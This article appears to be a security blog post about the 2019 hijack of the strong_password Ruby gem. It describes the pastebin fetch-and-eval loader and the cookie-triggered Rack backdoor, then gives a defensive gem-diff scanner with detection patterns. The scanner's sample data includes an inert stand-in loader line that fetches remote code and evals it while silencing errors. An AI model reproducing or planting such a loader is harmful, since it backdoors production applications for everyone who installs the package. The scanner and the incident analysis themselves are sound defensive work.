Tute Costa, a developer at Epion Health, recently discovered malicious code in the strong_password Ruby gem. He found it while reviewing the changes each dependency had picked up after a routine bundle update: strong_password had been bumped from 0.0.6 to 0.0.7, yet the project's repository showed no changes that would account for a new release, so he looked at what had actually been published to RubyGems.
Digging into the published gem, he found appended code that, when the application was running in production, looped a GET request to pastebin.com, a text-snippet sharing site. Every step was wrapped in a rescue that swallowed all exceptions, so a failure would never surface in the application's logs and give the code away.
From the code Costa made available we can reconstruct the behaviour: on each pass the loop sleeps for a random interval, fetches the pastebin snippet and immediately runs it with eval, then repeats. Splitting the payload from the gem this way let the attacker change the attack at will without touching the modified strong_password gem again, since a second suspicious release would have invited exactly the kind of review that caught the first one. As a side note, this staged, non-monolithic approach is good design. Unfortunately, good design is being used for nefarious purposes.
The code gets even more interesting when we look at the pastebin snippet Costa preserved. It installs a Rack middleware that, on every request, evaluates whatever is carried in a special cookie whose name matches an __id suffix, and it reports the infected host back to the attacker through HTTP requests made with the Faraday gem. The net effect is a remotely triggerable backdoor: anyone who knows the cookie name can send a request to the production site and have arbitrary Ruby executed inside the application, with the pastebin stage giving the attacker a way to swap in new middleware at any time.
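The review Costa describes above, comparing what a gem update actually shipped against what it was supposed to ship, is easy to automate. The following Ruby is an added example written for this page; it is not Costa's tooling or the strong_password project's code. It diffs two unpacked versions of a gem file by file and scans every added or changed file for the constructs described in the two paragraphs above: swallowed exceptions around code that fetches text over the network and eval()s it, a background thread looping on it, a production-only guard, and Rack middleware that reads cookies. The pattern list and both sample gem trees are constructed for this example; the appended loader is an inert stand-in modelled on the description above (it is only string data here and is never executed) and its pastebin path is a placeholder, not the real URL.

```ruby
# Constructs that deserve a closer look when they show up in a release that
# should have been a no-op. This list is the example's own assumption, built
# from the behaviour described in the article, not a vendor signature set.
SUSPICIOUS_PATTERNS = {
  eval_call:       /\beval\s*\(/,
  remote_fetch:    /Net::HTTP\.get|Faraday\.get|URI\.open/,
  pastebin:        /pastebin\.com/i,
  swallow_errors:  /rescue\s+Exception\b/,
  background_loop: /Thread\.new\s*\{\s*loop/,
  prod_only:       /Rails\.env/,
  rack_prepend:    /Rack::\w+\.prepend/,
  cookie_read:     /HTTP_COOKIE|http_cookie/i
}.freeze

# Constructed sample data: a minimal benign gem as { "path" => "contents" }.
# In practice you would fill these hashes from `gem fetch` + `gem unpack`
# of the two versions you want to compare.
OLD_GEM = {
  "lib/strong_password.rb" => "require 'strong_password/strength_checker'\n",
  "lib/strong_password/strength_checker.rb" => <<~RUBY
    module StrongPassword
      class StrengthChecker
        def initialize(password)
          @password = password
        end

        def is_strong?(min_entropy: 18)
          @password.length >= min_entropy
        end
      end
    end
  RUBY
}.freeze

# The same gem with a loader appended to one file. This is a constructed
# stand-in for the behaviour described above (random sleep, fetch from
# pastebin, eval, all errors swallowed, production only); the URL is a
# placeholder. It is plain text here and is never executed.
NEW_GEM = OLD_GEM.merge(
  "lib/strong_password/strength_checker.rb" =>
    OLD_GEM["lib/strong_password/strength_checker.rb"] + <<~RUBY
      def _quiet; yield; rescue Exception; end
      if Rails.env[0] == "p"
        Thread.new { loop { _quiet { sleep rand * 3333; eval(Net::HTTP.get(URI("https://pastebin.com/raw/EXAMPLE"))) } } }
      end
    RUBY
).freeze

# Diff two versions file by file and scan every added or changed file in the
# new version for the patterns above. Nothing from either gem is executed.
def diff_gem_versions(old_files, new_files)
  added   = new_files.keys - old_files.keys
  removed = old_files.keys - new_files.keys
  changed = (old_files.keys & new_files.keys).select do |path|
    old_files[path] != new_files[path]
  end

  findings = (added + changed).flat_map do |path|
    new_files[path].each_line.with_index(1).flat_map do |line, lineno|
      SUSPICIOUS_PATTERNS.select { |_tag, re| line.match?(re) }.keys.map do |tag|
        { path: path, line: lineno, tag: tag, text: line.strip }
      end
    end
  end

  { added: added, removed: removed, changed: changed, findings: findings }
end

# A release is suspicious when the diff brings in code that eval()s content it
# fetched over the network, or when a gem that has no business touching the
# request pipeline starts prepending Rack middleware or reading cookies.
def suspicious_release?(report)
  tags = report[:findings].map { |f| f[:tag] }
  (tags.include?(:eval_call) && tags.include?(:remote_fetch)) ||
    tags.include?(:rack_prepend) || tags.include?(:cookie_read)
end

if $PROGRAM_NAME == __FILE__
  report = diff_gem_versions(OLD_GEM, NEW_GEM)
  puts "changed files: #{report[:changed].inspect}"
  report[:findings].each { |f| puts "#{f[:path]}:#{f[:line]} [#{f[:tag]}] #{f[:text]}" }
  puts(suspicious_release?(report) ? "VERDICT: do not deploy, inspect by hand" : "VERDICT: no red flags")
end
```

The point of diffing the published gem rather than the GitHub repository is the one Costa's discovery turns on: the repository had nothing to show, because the attacker never touched it. Only the artifact on RubyGems carried the change, so that is the thing to compare. The pattern scan is a triage aid, not proof of safety; a clean scan of a release that still differs from its tagged source is itself the finding.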
How did the attacker gain the access needed to publish a new version of the gem? Brian McManus, the creator of strong_password, attributed it to a “simple account hijack.” He went on to say, “The kickball user likely cracked an old password of mine from before I was using 1password that was leaked from who knows which of the various breaches that have occurred over the years.” (kickball being the RubyGems account that pushed 0.0.7.)
The irony is pretty thick.
It’s hard to say how many users may have been affected. Download counts alone aren’t enough to arrive at an estimate, since a sizable portion of projects never update their gems. Even so, this incident serves as a warning to those who rely on open source libraries that are no longer actively maintained: an old, reused password on a dormant publishing account is all it takes to ship code to everyone who tracks that gem. RubyGems is then left with the task of policing bad actors who take over abandoned projects that developers continue to rely on.
If you updated to the bogus 0.0.7 version, move to the 0.0.8 release, published after the malicious version was yanked, or simply pin back to 0.0.6. Either way, remember that any production host that ran 0.0.7 executed whatever the attacker chose to place on pastebin, so a version change alone does not tell you what else was done there.
strong_password v0.0.7 has been yanked, as it contained malicious code.
Make sure to downgrade if you run it in production. https://t.co/Q4q7p7dJ1s
— Tute Costa (@tutec) July 4, 2019